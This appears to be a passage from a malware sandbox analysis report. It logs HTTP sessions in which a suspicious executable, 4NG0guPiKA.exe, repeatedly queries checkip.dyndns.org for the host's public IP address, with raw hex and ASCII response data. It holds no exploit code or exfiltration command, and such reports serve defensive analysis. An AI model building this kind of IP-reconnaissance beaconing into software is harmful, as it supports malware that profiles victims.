    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
    Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.10 | 49724 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:05:58.739515066 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 11, 2025 03:06:01.571975946 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 02:06:01 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.10 | 49726 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:06:02.389221907 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 11, 2025 03:06:06.283741951 CET | 697 | IN | HTTP/1.1 504 Gateway Time-out
    Date: Sat, 11 Jan 2025 02:06:06 GMT
    Content-Type: text/html
    Content-Length: 557
    Connection: keep-alive
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
    Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.1049727132.226.8.169808156C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 11, 2025 03:06:06.295854092 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 11, 2025 03:06:10.363274097 CET697INHTTP/1.1 504 Gateway Time-out
                                                                                                          Date: Sat, 11 Jan 2025 02:06:10 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 557
                                                                                                          Connection: keep-alive
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Timestamp: Jan 11, 2025 03:06:10.371051073 CET  Bytes transferred: 127  Direction: OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org

Timestamp: Jan 11, 2025 03:06:11.709779024 CET  Bytes transferred: 273  Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 02:06:11 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 10  Source IP: 192.168.2.10  Source Port: 49729  Destination IP: 132.226.8.169  Destination Port: 80  PID: 8156  Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp: Jan 11, 2025 03:06:12.603893995 CET  Bytes transferred: 151  Direction: OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Jan 11, 2025 03:06:15.106184959 CET  Bytes transferred: 273  Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 02:06:14 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 11  Source IP: 192.168.2.10  Source Port: 49731  Destination IP: 132.226.8.169  Destination Port: 80  PID: 8156  Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp: Jan 11, 2025 03:06:15.976789951 CET  Bytes transferred: 151  Direction: OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Jan 11, 2025 03:06:17.024198055 CET  Bytes transferred: 273  Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 02:06:16 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 12  Source IP: 192.168.2.10  Source Port: 49733  Destination IP: 132.226.8.169  Destination Port: 80  PID: 8156  Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp: Jan 11, 2025 03:06:17.844587088 CET  Bytes transferred: 151  Direction: OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Jan 11, 2025 03:06:18.657212019 CET  Bytes transferred: 273  Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 02:06:18 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 13  Source IP: 192.168.2.10  Source Port: 49735  Destination IP: 132.226.8.169  Destination Port: 80  PID: 8156  Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp: Jan 11, 2025 03:06:19.547066927 CET  Bytes transferred: 151  Direction: OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Jan 11, 2025 03:06:20.372675896 CET  Bytes transferred: 273  Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 02:06:20 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 14  Source IP: 192.168.2.10  Source Port: 49737  Destination IP: 132.226.8.169  Destination Port: 80  PID: 8156  Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp: Jan 11, 2025 03:06:21.545291901 CET  Bytes transferred: 151  Direction: OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Jan 11, 2025 03:06:22.353651047 CET  Bytes transferred: 273  Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 02:06:22 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 15  Source IP: 192.168.2.10  Source Port: 49739  Destination IP: 132.226.8.169  Destination Port: 80  PID: 8156  Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp: Jan 11, 2025 03:06:23.249130964 CET  Bytes transferred: 151  Direction: OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Jan 11, 2025 03:06:24.109461069 CET  Bytes transferred: 273  Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 02:06:23 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 16  Source IP: 192.168.2.10  Source Port: 49741  Destination IP: 132.226.8.169  Destination Port: 80  PID: 8156  Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp: Jan 11, 2025 03:06:24.921981096 CET  Bytes transferred: 151  Direction: OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Jan 11, 2025 03:06:25.734456062 CET  Bytes transferred: 273  Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 02:06:25 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 17  Source IP: 192.168.2.10  Source Port: 49743  Destination IP: 132.226.8.169  Destination Port: 80  PID: 8156  Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp: Jan 11, 2025 03:06:26.642739058 CET  Bytes transferred: 151  Direction: OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Jan 11, 2025 03:06:27.470195055 CET  Bytes transferred: 273  Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 02:06:27 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 18  Source IP: 192.168.2.10  Source Port: 49745  Destination IP: 132.226.8.169  Destination Port: 80  PID: 8156  Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp: Jan 11, 2025 03:06:28.288182974 CET  Bytes transferred: 151  Direction: OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Jan 11, 2025 03:06:29.113658905 CET  Bytes transferred: 273  Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 02:06:28 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 19  Source IP: 192.168.2.10  Source Port: 49747  Destination IP: 132.226.8.169  Destination Port: 80  PID: 8156  Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp: Jan 11, 2025 03:06:30.117631912 CET  Bytes transferred: 151  Direction: OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Jan 11, 2025 03:06:30.949954987 CET  Bytes transferred: 273  Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 02:06:30 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID: 20  Source IP: 192.168.2.10  Source Port: 49749  Destination IP: 132.226.8.169  Destination Port: 80  PID: 8156  Process: C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp: Jan 11, 2025 03:06:31.761440039 CET  Bytes transferred: 151  Direction: OUT
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive

Timestamp: Jan 11, 2025 03:06:32.586575031 CET  Bytes transferred: 273  Direction: IN
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2025 02:06:32 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.10 | 49751 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:06:33.444525957 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 11, 2025 03:06:34.289345026 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 02:06:34 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.10 | 49753 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:06:35.162589073 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 11, 2025 03:06:36.037976027 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 02:06:35 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.10 | 49755 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:06:36.893040895 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 11, 2025 03:06:38.221594095 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 02:06:38 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.10 | 49757 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:06:39.043637991 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 11, 2025 03:06:39.882061958 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 02:06:39 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.10 | 49759 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:06:40.771517038 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 11, 2025 03:06:41.594609976 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 02:06:41 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.10 | 49761 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:06:42.434350014 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 11, 2025 03:06:43.279299021 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 02:06:43 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.10 | 49763 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:06:44.526838064 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 11, 2025 03:06:45.845668077 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 02:06:45 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.10 | 49765 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:06:46.862025976 CET | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 11, 2025 03:06:47.889677048 CET | 273 | IN | HTTP/1.1 200 OK
    Date: Sat, 11 Jan 2025 02:06:47 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.10 | 49767 | 132.226.8.169 | 80 | 8156 | C:\Users\user\Desktop\4NG0guPiKA.exe

Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:06:48.876497984 CET | 151 | OUT | GET / HTTP/1.1
